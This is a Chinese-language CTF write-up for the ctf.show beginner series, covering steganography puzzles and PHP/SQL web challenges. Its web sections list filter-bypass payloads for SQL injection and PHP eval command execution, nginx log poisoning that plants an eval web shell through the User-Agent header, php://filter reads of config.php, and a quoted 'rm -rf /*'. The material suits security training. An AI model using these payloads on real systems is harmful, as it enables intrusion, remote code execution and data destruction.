\u6211\u4e00\u70b9\u51fb\u5c31\u5728\u6807\u7b7e\u9875\u6253\u5f00\u4e86\uff0c\u4e14\u65e0\u6cd5\u53e6\u5b58\u4e3a\uff1a<\/p>\n
\"image-20220531210150242\"<\/div><\/p>\n
\u7ecf\u8fc7\u5e08\u5085\u4eec\u7684\u6307\u70b9\u6211\u53d1\u73b0\u4e86\u6b63\u786e\u65b9\u6cd5\uff1a<\/p>\n
\"image-20220531210240911\"<\/div>
\n
\"image-20220531210302450\"<\/div><\/p>\n
\u8fd9\u4e2a\u624d\u662f\u6b63\u89e3\uff0c\u6211\u662f\u61a8\u6279\uff0c\u548b\u5c31\u6ca1\u60f3\u5230\u5462:dog2:<\/p>\n
\u76f4\u63a5\u6253\u5f00\u9644\u4ef6\uff1a<\/p>\n
\"image-20220531210425697\"<\/div><\/p>\n
\u7528winhex\u6253\u5f00\u9644\u4ef6\uff1a<\/p>\n
\"image-20220531210449321\"<\/div><\/p>\n
\u6587\u4ef6\u5934\u602a\u602a\u7684\uff1a\u6b63\u5e38\u5e94\u8be5\u662f89 50 4E 47 0D 0A 1A 0A<\/code><\/p>\n
\u6539\u4e00\u4e0b\u5f97\u5230flag\uff1a   
\"image-20220531210619258\"<\/div><\/p>\n
\u9690\u51992<\/h2>\n
\u5c0f\u660e\uff1a???<\/code><\/pre>\n
\u56fe\u7247\u662f\uff1a<\/p>\n
\"image-20220531210800677\"<\/div><\/p>\n
\u592a\u56a3\u5f20\u4e86\uff0c\u76f4\u63a5\u4e0a\u5de5\u5177\uff1a<\/p>\n
\"image-20220531210859901\"<\/div><\/p>\n
\u6253\u5f00\u770b\u4e00\u4e0b\u6587\u4ef6\u683c\u5f0f\uff0c\u5c31\u633a\u7a81\u7136\u7684\u3002\u3002\u3002\u3002<\/p>\n
\"image-20220531210940616\"<\/div><\/p>\n
\u840c\u65b0\u9690\u51995<\/h2>\n
\u6253\u5f00\u770b\u4e00\u4e0b\u9644\u4ef6\uff1a<\/p>\n
                              _.._        ,------------.\n                           ,'      `.   \u4d00\u5a00\u5700\u4700\u4300\u5a00\u5a00\u4900\u4e00\u4200\u5100\u5700\u3600\u5800\u3300\u4b00\u4e00\u4600\u3200\u5600\u3600\u5900\u5400\u5600\u4c00\u3500\u3400\u5700\u3600\u3300\u5400\u4800\u4c00\u3500\u5200\u4400\u4700\u4d00\u5300\u3700\u4600\u4500\u3d00\u3d00\u3d00\u3d00\u3d00\u3d00\n                          \/  __) __` \\    `-,----------'                                                  \\\\=\u3002=\/\/\n                         (  (`-`(-')  ) _.-'\n                         \/)  \\  = \/  (\n                        \/'    |--' .  \\\n                       (  ,---|  `-.)__`\n                        )(  `-.,--'   _`-.\n                       '\/,'          (  ",\n                        (_       ,    `\/,-' )\n                        `.__,  : `-'\/  \/`--'\n                          |     `--'  |\n                          `   `-._   \/\n                           \\        (\n                           \/\\ .      \\.  \n                          \/ |` \\     ,-\\\n                         \/  \\| .)   \/   \\\n                        ( ,'|\\    ,'     :\n                        | \\,`.`--"\/      }\n                        `,'    \\  |,'    \/\n                       \/ "-._   `-\/      |\n                       "-.   "-.,'|     ;\n                      \/        _\/["---'""]\n                     :        \/  |"-     '\n                     '           |      \/\n                                 `      |<\/code><\/pre>\n
\u6211\u9ebb\u4e86\uff0c\u8fd9\u662f\u4e71\u7801\u5427\uff0c\u8f6c\u5316\u6210unicode\uff1a<\/p>\n
\"image-20220531211331779\"<\/div><\/p>\n
16\u8fdb\u5236\u518d\u8f6c\u5316\u6210\u5b57\u7b26\u770b\u770b\uff1a<\/p>\n
\"image-20220531211547597\"<\/div><\/p>\n
\u5f97\u5230\uff1a<\/p>\n
MZWGCZZINBQW6X3KNF2V6YTVL54W63THL5RDGMS7FE======\\\\=0=\/\/<\/code><\/pre>\n
\u540e\u9762\u90a3\u7fa4\\\\=0=\/\/<\/code>\u5e94\u8be5\u6ca1\u5565\u7528\uff0c\u53bb\u6389\uff0c\u89c2\u5bdf\u5b57\u7b26\u4e32\uff0c\u770b\u5230\u6700\u5927\u4e3a7\uff0cbase32\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220531211825263\"<\/div><\/p>\n
\u840c\u65b0\u9690\u51996<\/h2>\n
\u9644\u4ef6\u89e3\u7801\u4ee5\u540e\u662f\u4e00\u6bb5\u97f3\u9891\uff1a<\/p>\n
\"image-20220531214918986\"<\/div><\/p>\n
Audacity<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220531215207974\"<\/div><\/p>\n
\u6709\u4e00\u4e32\u795e\u79d8\u7684\u7b26\u53f7\uff0c\u6000\u7591\u662f\u83ab\u65af\u7535\u7801\uff0c\u8f6c\u5316\u4e00\u4e0b\uff1a<\/p>\n
-- ..- --.. .. -.- .. ... --. ----- ----- -..<\/code><\/pre>\n
\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220531215333344\"<\/div><\/p>\n
\u63d0\u4ea4\u7684\u65f6\u5019\u522b\u5fd8\u8bb0\u52a0\u4e0a\u683c\u5f0f\u54e6\uff01<\/p>\n
web1<\/h2>\n
\u4ee3\u7801\u5f88\u5b89\u5168\uff0c\u6ca1\u6709\u6f0f\u6d1e\u3002<\/code><\/pre>\n
\u6253\u5f00\u73af\u5883\uff1a<\/p>\n
<html>\n<head>\n    <title>ctf.show\u840c\u65b0\u8ba1\u5212web1<\/title>\n    <meta charset="utf-8">\n<\/head>\n<body>\n<?php\n# \u5305\u542b\u6570\u636e\u5e93\u8fde\u63a5\u6587\u4ef6\ninclude("config.php");\n# \u5224\u65adget\u63d0\u4ea4\u7684\u53c2\u6570id\u662f\u5426\u5b58\u5728\nif(isset($_GET['id'])){\n    $id = $_GET['id'];\n    # \u5224\u65adid\u7684\u503c\u662f\u5426\u5927\u4e8e999\n    if(intval($id) > 999){\n        # id \u5927\u4e8e 999 \u76f4\u63a5\u9000\u51fa\u5e76\u8fd4\u56de\u9519\u8bef\n        die("id error");\n    }else{\n        # id \u5c0f\u4e8e 999 \u62fc\u63a5sql\u8bed\u53e5\n        $sql = "select * from article where id = $id order by id limit 1 ";\n        echo "\u6267\u884c\u7684sql\u4e3a\uff1a$sql<br>";\n        # \u6267\u884csql \u8bed\u53e5\n        $result = $conn->query($sql);\n        # \u5224\u65ad\u6709\u6ca1\u6709\u67e5\u8be2\u7ed3\u679c\n        if ($result->num_rows > 0) {\n            # \u5982\u679c\u6709\u7ed3\u679c\uff0c\u83b7\u53d6\u7ed3\u679c\u5bf9\u8c61\u7684\u503c$row\n            while($row = $result->fetch_assoc()) {\n                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";\n            }\n        }\n        # \u5173\u95ed\u6570\u636e\u5e93\u8fde\u63a5\n        $conn->close();\n    }   \n}else{\n    highlight_file(__FILE__);\n}\n?>\n<\/body>\n<!-- flag in id = 1000 -->\n<\/html><\/code><\/pre>\n
flag \u5728id=1000\uff0c\u4f46\u662f\u5927\u4e8e999\u5c31\u4f1a\u6302\uff0c\u4e48\u6709\u8fc7\u6ee4\uff0c\u6784\u9020\u7ed5\u8fc7\uff1a==Atkxor<\/a>\u5e08\u5085\u603b\u7ed3\u7684payload==<\/p>\n
?id='1000'                                                    #\u5b57\u7b26\u4e32\u7ed5\u8fc7\n?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=0x38e                                                       #\u5341\u516d\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd\n?id=1000 or 1=1--+                                              #sql\u6ce8\u5165\n?id=100 or id=1000                                              #\u903b\u8f91\u7ed5\u8fc7\n?id=100 || id=1000\n?id=500%2b500                                                   # +\u53f7\u7684\u8f6c\u4e49\u7b26\u662f%2B\n?id=900--100\n?id=100*10\n?id=100\/0.1\n?id=--1000                                                      #\u53d6\u4e24\u6b21\u76f8\u53cd\u6570\n?id=200^800                                                     #\u5f02\u6216<\/code><\/pre>\n
web2<\/h2>\n
\u7ba1\u7406\u5458\u8d76\u7d27\u4fee\u8865\u4e86\u6f0f\u6d1e\uff0c\u8fd9\u4e0b\u5e94\u8be5\u6ca1\u95ee\u9898\u4e86\u5427\uff1f<\/code><\/pre>\n
if(preg_match("\/or|\\+\/i",$id)){\n            die("id error");\n    }<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86 or \u548c + \uff1b<\/p>\n
payload\uff1a\n?id='1000'                                                    #\u5b57\u7b26\u4e32\u7ed5\u8fc7\n?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd\n?id=100 || id=1000\n?id=900--100\n?id=100*10\n?id=100\/0.1\n?id=--1000                                                      #\u53d6\u4e24\u6b21\u76f8\u53cd\u6570\n?id=200^800                                                     #\u5f02\u6216<\/code><\/pre>\n
web3<\/h2>\n
\u7ba1\u7406\u5458\u88ab\u72e0\u72e0\u7684\u6559\u80b2\u4e86\uff0c\u6240\u4ee5\u51b3\u5b9a\u597d\u597d\u4fee\u590d\u4e00\u756a\u3002\u8fd9\u6b21\u6ca1\u95ee\u9898\u4e86\u3002<\/code><\/pre>\n
if(preg_match("\/or|\\-|\\\\|\\*|\\< |\\>|\\!|x|hex|\\+\/i",$id)){\n            die("id error");  \n    }<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86\u7b97\u672f\u8fd0\u7b97\u7b26\uff1a<\/p>\n
?id='1000'                                                    #\u5b57\u7b26\u4e32\u7ed5\u8fc7\n?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd\n?id=100 || id=1000\n?id=100*10\n?id=100\/0.1\n?id=200^800                                                     #\u5f02\u6216<\/code><\/pre>\n
\u5e08\u5085\u8bf4\u7684\u771f\u7684\u6b38\uff0c\u8bf4\u662f\u8fc7\u6ee4\u4e86*\uff0c\u4f46\u662f\u8fd8\u80fd\u7528\u6b38\uff01\uff01\uff01\uff01:happy:<\/p>\n
web4<\/h2>\n
\u7ba1\u7406\u5458\u963f\u5446\u53c8\u5931\u8d25\u4e86\uff0c\u8fd9\u6b21\u4e00\u5b9a\u8981\u5835\u4f4f\u6f0f\u6d1e<\/code><\/pre>\n
if(preg_match("\/or|\\-|\\\\\\|\\\/|\\\\*|\\<|\\>|\\!|x|hex|\\(|\\)|\\+|select\/i",$id)){\n            die("id error");\n    }<\/code><\/pre>\n
\u5f7b\u5e95\u8fc7\u6ee4\u4e86\u7b97\u6570\u8fd0\u7b97\u7b26\u548cselect<\/code><\/p>\n
?id='1000'                                                    #\u5b57\u7b26\u4e32\u7ed5\u8fc7\n?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd\n?id=100 || id=1000\n?id=200^800                                                     #\u5f02\u6216<\/code><\/pre>\n
web5<\/h2>\n
\u963f\u5446\u88ab\u8001\u677f\u72c2\u9a82\u4e00\u901a\uff0c\u51b3\u5b9a\u6539\u6389\u81ea\u5df1\u5927\u610f\u7684\u6bdb\u75c5\uff0c\u75db\u4e0b\u6740\u624b\uff0c\u4fee\u8865\u6f0f\u6d1e\u3002<\/code><\/pre>\n
if(preg_match("\/\\'|\\"|or|\\||\\-|\\\\\\|\\\/|\\\\*|\\<|\\>|\\!|x|hex|\\(|\\)|\\+|select\/i",$id)){\n            die("id error");\n    }<\/code><\/pre>\n
\u9664\u4e86\u4e0a\u9762\u7684\u8fd8\u8fc7\u6ee4\u4e86||<\/code>\u548c'<\/code>\uff1a<\/p>\n
?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd\n?id=200^800                                                     #\u5f02\u6216<\/code><\/pre>\n
web6<\/h2>\n
\u963f\u5446\u4e00\u53e3\u8001\u8840\u5dee\u70b9\u564e\u6b7b\u81ea\u5df1\uff0c\u51b3\u5b9a\u6760\u4e0a\u4e86<\/code><\/pre>\n
if(preg_match("\/\\'|\\"|or|\\||\\-|\\\\\\|\\\/|\\\\*|\\<|\\>|\\^|\\!|x|hex|\\(|\\)|\\+|select\/i",$id)){\n            die("id error");\n    }<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86^<\/code>\uff1a<\/p>\n
?id=0b1111101000                                                #\u4e8c\u8fdb\u5236\u7ed5\u8fc7\n?id=~~1000                                                      #\u4e24\u6b21\u53d6\u53cd<\/code><\/pre>\n
web7<\/h2>\n
\u963f\u5446\u5f97\u5230\u6700\u9ad8\u6307\u793a\uff0c\u5982\u679c\u8fd8\u51fa\u95ee\u9898\uff0c\u5c31\u5377\u94fa\u76d6\u6eda\u86cb\uff0c\u963f\u5446\u5fc3\u5728\u6d41\u8840\u3002<\/code><\/pre>\n
if(preg_match("\/\\'|\\"|or|\\||\\-|\\\\\\|\\\/|\\\\*|\\<|\\>|\\^|\\!|\\~|x|hex|\\(|\\)|\\+|select\/i",$id)){\n            die("id error");\n    }<\/code><\/pre>\n
\u53c8\u8fc7\u6ee4\u4e86\u53d6\u53cd~<\/code>\uff1b<\/p>\n
\/?id=0b1111101000    #\u4e8c\u8fdb\u5236\u7ed5\u8fc7<\/code><\/pre>\n
web8<\/h2>\n
\u963f\u5446\u719f\u6089\u7684\u4e00\u987f\u64cd\u4f5c\uff0c\u53bb\u4e86\u57c3\u585e\u5c14\u6bd4\u4e9a\u3002\nPS:\u963f\u5446\u7b2c\u4e00\u5b63\u5b8c\uff0c\u656c\u8bf7\u671f\u5f85\u7b2c\u4e8c\u5b63\uff01<\/code><\/pre>\n
<?php\n# \u5305\u542b\u6570\u636e\u5e93\u8fde\u63a5\u6587\u4ef6,key flag \u4e5f\u5728\u91cc\u9762\u5b9a\u4e49\ninclude("config.php");\n# \u5224\u65adget\u63d0\u4ea4\u7684\u53c2\u6570id\u662f\u5426\u5b58\u5728\nif(isset($_GET['flag'])){\n        if(isset($_GET['flag'])){\n                $f = $_GET['flag'];\n                if($key===$f){\n                        echo $flag;\n                }\n        }\n}else{\n    highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u8fd9\u4e2a\u771f\u7684\u662f\u6ca1\u6709\u60f3\u5230\uff0c\u8fd9\u91cc\u7684 config.php \u4e5f\u8bbf\u95ee\u4e0d\u4e86\uff0c\u4e00\u770bwp\u5c45\u7136\u662f\u5220\u5e93\u8dd1\u8def\u3002\u3002\u3002\u3002<\/p>\n
?flag=rm -rf \/*<\/code><\/pre>\n
web9<\/h2>\n
\u963f\u5446\u5728\u57c3\u585e\u4fc4\u6bd4\u4e9a\u7ec8\u4e8e\u627e\u4e86\u4e00\u4e2a\u7f51\u7ba1\u7684\u5de5\u4f5c\uff0c\u95f2\u6687\u65f6\u8fd8\u80fd\u79cd\u70b9\u83dc\u3002<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(preg_match("\/system|exec|highlight\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u522b\u88ab\u864e\u5230\u4e86\uff0c\u5e76\u6ca1\u6709\u5bf9\u7ed9\u51fa\u7684\u90a3\u4e9b\u51fd\u6570\u8fdb\u884c\u8fc7\u6ee4\uff01\uff01\uff01<\/p>\n
?c=system('cat config.php');\n#?c=highlight_file('config.php');    \u4ee3\u7801\u9ad8\u4eae\u4e5f\u53ef\u4ee5<\/code><\/pre>\n
web10<\/h2>\n
\u963f\u5446\u770b\u89c1\u5bf9\u9762\u4e8c\u9ed1\u6025\u51b2\u51b2\u7684\u8dd1\u8fc7\u6765\uff0c\u544a\u8bc9\u963f\u5446\u51fa\u5927\u4e8b\u4e86\uff0c\u963f\u5446\u95ee\u4ec0\u4e48\u4e8b\uff0c\u4e8c\u9ed1\u8bf4\uff1a\u8fd9\u51e0\u5929\u5929\u65f1\uff0c\u4f60\u83dc\u6b7b\u4e86\uff01<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|exec|highlight\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u8fc7\u6ee4\u6389\u4e86system<\/code>\u3001exec<\/code>\u3001highlight<\/code>\uff1b<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u5176\u4ed6\u7cfb\u7edf\u547d\u4ee4\u6267\u884c\u51fd\u6570<\/h3>\n
#php\u4e2d\u4f5c\u4e3a\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u51fd\u6570\u6709\uff1a\nsystem()\nexec()\npassthru()\nshell_exec()\n``\npopen()\nproc_open()\npcntl_exec()<\/code><\/pre>\n
\u65b9\u6cd5\u4e8c\uff1a\u62fc\u63a5\u5b57\u7b26\u4e32<\/h3>\n
?c=$a='sys';$b='tem';$d=$a.$b;$d('cat config.php');<\/code><\/pre>\n
web11<\/h2>\n
\u963f\u5446\u542c\u5b8c\u81ea\u5df1\u83dc\u6b7b\u4e86\uff0c\u81ea\u5df1\u5446\u4e86\u3002\u51b3\u5b9a\u4fee\u597d\u6f0f\u6d1e\uff0c\u7edd\u5bf9\u4e0d\u80fd\u8ba9\u81ea\u5df1\u518d\u83dc\u6b7b\u4e86\u3002<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|exec|highlight|cat\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u53c8\u8fc7\u6ee4\u6389\u4e86cat<\/code><\/p>\n
cat                                             \u7531\u7b2c\u4e00\u884c\u5f00\u59cb\u663e\u793a\u5185\u5bb9\uff0c\u5e76\u5c06\u6240\u6709\u5185\u5bb9\u8f93\u51fa\ntac                                             \u4ece\u6700\u540e\u4e00\u884c\u5012\u5e8f\u663e\u793a\u5185\u5bb9\uff0c\u5e76\u5c06\u6240\u6709\u5185\u5bb9\u8f93\u51fa\nmore                                            \u6839\u636e\u7a97\u53e3\u5927\u5c0f\uff0c\u4e00\u9875\u4e00\u9875\u7684\u73b0\u5b9e\u6587\u4ef6\u5185\u5bb9\nless                                            \u548cmore\u7c7b\u4f3c\uff0c\u4f46\u5176\u4f18\u70b9\u53ef\u4ee5\u5f80\u524d\u7ffb\u9875\uff0c\u800c\u4e14\u8fdb\u884c\u53ef\u4ee5\u641c\u7d22\u5b57\u7b26\nhead                                            \u53ea\u663e\u793a\u5934\u51e0\u884c\ntail                                            \u53ea\u663e\u793a\u6700\u540e\u51e0\u884c\nnl                                              \u7c7b\u4f3c\u4e8ecat -n\uff0c\u663e\u793a\u65f6\u8f93\u51fa\u884c\u53f7\ntailf                                           \u7c7b\u4f3c\u4e8etail -f\nsort                                            \u547d\u4ee4\u7528\u4e8e\u5c06\u6587\u672c\u6587\u4ef6\u5185\u5bb9\u52a0\u4ee5\u6392\u5e8f\u3002\nod                                              od\u6307\u4ee4\u4f1a\u8bfb\u53d6\u6240\u7ed9\u4e88\u7684\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u5e76\u5c06\u5176\u5185\u5bb9\u4ee5\u516b\u8fdb\u5236\u5b57\u7801\u5448\u73b0\u51fa\u6765\u3002<\/code><\/pre>\n
\u65b9\u6cd5\u4e00\uff1a\u5176\u4ed6\u547d\u4ee4\u6267\u884c\u51fd\u6570<\/h3>\n
?c=passthru('nl config.php'); <\/code><\/pre>\n
\u65b9\u6cd5\u4e8c\uff1a\u62fc\u63a5\u5b57\u7b26\u4e32\uff1a<\/h3>\n
$a='ca';$b='t';$c=$a.$b;passthru("$c config.php");\n#\u5728php\u8bed\u8a00\u4e2d\u5355\u5f15\u53f7\u4e32\u548c\u53cc\u5f15\u53f7\u4e32\u7684\u5904\u7406\u662f\u4e0d\u540c\u7684\u3002\u53cc\u5f15\u53f7\u4e32\u4e2d\u7684\u5185\u5bb9\u53ef\u4ee5\u88ab\u89e3\u91ca\u800c\u4e14\u66ff\u6362\uff0c\u800c\u5355\u5f15\u53f7\u4e32\u4e2d\u7684\u5185\u5bb9\u603b\u88ab\u8ba4\u4e3a\u662f\u666e\u901a\u5b57\u7b26\u3002\n?c=$a='sys';$b='tem';$d=$a.$b;$d('nl config.php');<\/code><\/pre>\n
web12<\/h2>\n
\u963f\u5446\u4e0d\u614c\u4e0d\u5fd9\u7684\u62d4\u6389\u81ea\u5df1\u6240\u6709\u7684\u83dc\uff0c\u4ee5\u540e\u81ea\u5df1\u5c31\u4e0d\u4f1a\u83dc\u6b7b\u4e86\u3002<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|exec|highlight|cat|\\.|php|config\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u8fc7\u6ee4\u6389\u4e86php<\/code>\u3001.<\/code>\u3001config<\/code>\uff0c\u8fd9\u6837\u5c31\u4e0d\u80fd\u62fc\u63a5\u5b57\u7b26\u4e32\u4e86\uff1a<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u901a\u914d\u7b26<\/h3>\n
?c=passthru('nl *');<\/code><\/pre>\n
\u65b9\u6cd5\u4e8c\uff1a\u7f16\u7801\u7ed5\u8fc7\uff08\u58a8\u5b50\u8f69\u3001<\/a>\u5e08\u5085\u7684wp\u91cc\u53d1\u73b0\u7684\uff01\uff01\uff09<\/h3>\n
$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);<\/code><\/pre>\n
web13<\/h2>\n
\u963f\u5446\u5f7b\u5e95\u5446\u4e86\uff0c\u963f\u5446\u62ff\u8d77\u8c37\u59d0\u641c\u7d22\u597d\u4e45\uff0c\u7ec8\u4e8e\u627e\u5230\u66f4\u72e0\u7684\u65b9\u6cd5\u3002<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|exec|highlight|cat|\\.|\\;|file|php|config\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u518d\u6b21\u8fc7\u6ee4\u6389\u4e86\uff1b<\/code>\u548cfile<\/code>\uff0c\u53ef\u4ee5\u7528?><\/code>\u6765\u4ee3\u66ff\uff1a<\/p>\n
?c=passthru('nl *')?><\/code><\/pre>\n
web14<\/h2>\n
\u963f\u5446\u5fcd\u65e0\u53ef\u5fcd\u4e86\uff0c\u544a\u8bc9\u81ea\u5df1\uff0c\u5982\u679c\u8fd8\u88ab\u653b\uff0c\u81ea\u5df1\u5c31\u8df3\u4e0b\u53bb<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|exec|highlight|cat|\\(|\\.|\\;|file|php|config\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u8fd9\u6b21\u8fc7\u6ee4\u6389\u4e86(<\/code>\uff0c\u6211\u771f\u7684\u4f1a\u8c22\uff1a<\/p>\n
?c=echo `$_POST[a]`?> \na = cat config.php\n#\u6216\u8005payload\uff1a?c=include$_GET[a]?>&a=php:\/\/filter\/read=convert.base64-encode\/resource=config.php<\/code><\/pre>\n
\"image-20220601145447574\"<\/div><\/p>\n
web15<\/h2>\n
\u4eba\u4e3a\u4ec0\u4e48\u8981\u6d3b\u7740\uff1f\u96be\u9053\u57c3\u585e\u4fc4\u6bd4\u4e9a\u518d\u65e0\u6211\u963f\u5446\u5bb9\u8eab\u4e4b\u5904\uff1f<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(!preg_match("\/system|\\\\*|\\?|\\<|\\>|\\=|exec|highlight|cat|\\(|\\.|file|php|config\/i",$c)){\n                eval($c);\n        }else{\n            die("cmd error");\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u53d1\u73b0\u4ed6\u628a><\/code>\uff0c\u4f46\u662f\u53c8\u628a;<\/code>\u653e\u51fa\u6765\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n
?c=echo `_POST[a]`;\na=nl *\n# include $_GET[a];&a=php:\/\/filter\/read=convert.base64-encode\/resource=config.php<\/code><\/pre>\n
\"image-20220601150458553\"<\/div><\/p>\n
web16<\/h2>\n
\u963f\u5446\u4e3a\u4e86\u81ea\u5df1\u7684\u68a6\u60f3(fulage)\uff0c\u51b3\u5b9a\u6765\u4e00\u6ce2\u53cd\u5411\u8dd1\u8def\u3002<\/code><\/pre>\n
<?php\n# flag in config.php\ninclude("config.php");\nif(isset($_GET['c'])){\n        $c = $_GET['c'];\n        if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){\n            echo $flag;\n        }else{\n            echo "nonono!";\n        }\n}else{\n        highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n
\u5728\u7ebf\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220601151546675\"<\/div><\/p>\n
\u4f20\u5165\u76f8\u5173\u53c2\u6570\u5373\u53ef\uff01<\/p>\n
\u5f53\u7136\uff0c\u7f16\u5199\u811a\u672c\u8fdb\u884c\u7206\u7834\u4e5f\u662f\u4e00\u79cd\u5f88\u4e0d\u9519\u7684\u65b9\u6cd5\uff01\uff01\uff01\uff01<\/p>\n
import hashlib\nstr='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\nfor i in str:\n    for j in str:\n        for k in str:\n            s = hashlib.md5(('ctfshow'+i+j+k).encode()).hexdigest()\n            if s == 'a6f57ae38a22448c2f07f3f95f49c84e':                           \n                print(i + j + k)                                                <\/code><\/pre>\n
web17<\/h2>\n
\u963f\u5446\u7ec8\u4e8e\u6000\u63e3\u81ea\u5df1\u7684\u68a6\u60f3\u6765\u5230\u4e86\u6545\u571f\uff0c\u51ed\u501f\u7740\u9ad8\u8d85\u7684\u7cfb\u7edf\u5783\u573e\u6e05\u7406(rm -rf \/*)\u6280\u672f\uff0c\u5f88\u5feb\u7684\u963f\u5446\u627e\u5230\u4e86\u4e00\u4efd\u7a0b\u5e8f\u5458\u5de5\u4f5c<\/code><\/pre>\n
<?php\nif(isset($_GET['c'])){\n       $c=$_GET['c'];\n       if(!preg_match("\/php\/i",$c)){\n               include($c);\n       }\n}else{\n        highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fd9\u662f\u4e00\u4e2a\u8003\u5bdf\u65e5\u5fd7\u5305\u542b\u7684\u9898\u76ee\uff0c\u8bbf\u95ee\u65e5\u5fd7\u6587\u4ef6\uff1a?c=\/var\/log\/nginx\/access.log<\/code><\/p>\n
\"image-20220601152856617\"<\/div><\/p>\n
\u53d1\u73b0\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\u4e86\u8bf7\u6c42\u5934\uff0c\u5229\u7528\u8fd9\u4e00\u70b9\uff0c\u6293\u5305\u6539\u5305\uff0c\u4f20\u4e00\u4e2a\u51e0\u53e5\u8bdd\u6728\u9a6c\u5230\u8bf7\u6c42\u5934\u4e0a\uff0c\u8fd9\u6837\u65e5\u5fd7\u7b49\u4e0b\u5c31\u4f1a\u81ea\u52a8\u6267\u884c\uff1a<\/p>\n
User-Agent: <?php eval($_POST['hack']);?>\n#\u6216\u8005\u50cf\u4e0b\u9762\u8fd9\u6837\u4e5f\u53ef\u4ee5\nUser-Agent: <?php system('ls');?>\nUser-Agent: <?php system('cat 36d.php');?><\/code><\/pre>\n
\u8681\u5251\u4e00\u8fde\u5c31\u5f97\u5230\u4e86\uff1a(18\u523021\u4e5f\u90fd\u53ef\u4ee5nginx\u65e5\u5fd7\u5305\u542b<\/code>\u4e00\u628a\u68ad)<\/p>\n
\"image-20220601153729682\"<\/div><\/p>\n
web18<\/h2>\n
\u963f\u5446\u52a0\u5165\u4e86\u8fc7\u6ee4\uff0c\u8fd9\u4e0b\u5b8c\u7f8e\u4e86\u3002<\/code><\/pre>\n
<?php\nif(isset($_GET['c'])){\n       $c=$_GET['c'];\n       if(!preg_match("\/php|file\/i",$c)){\n               include($c);\n       }\n}else{\n        highlight_file(__FILE__);\n}<\/code><\/pre>\n
web19<\/h2>\n
\u7528\u5230\u4e86\u89e3\u7801\uff1f\u679c\u65ad\u7981\u7528base\uff0c\u54fc<\/code><\/pre>\n
web20<\/h2>\n
\u767e\u5bc6\u4e00\u758f\uff0c\u7adf\u7136\u8fd8\u6709\u4e2arot<\/code><\/pre>\n
web21<\/h2>\n
\u963f\u5446\u7edd\u5730\u53cd\u51fb<\/code><\/pre>\n
web22<\/h2>\n
\u8fd8\u80fd\u641e\uff0c\u963f\u5446\u8868\u793a\u5c06\u76f4\u64ad\u5012\u7acb\u653e\u6c34<\/code><\/pre>\n
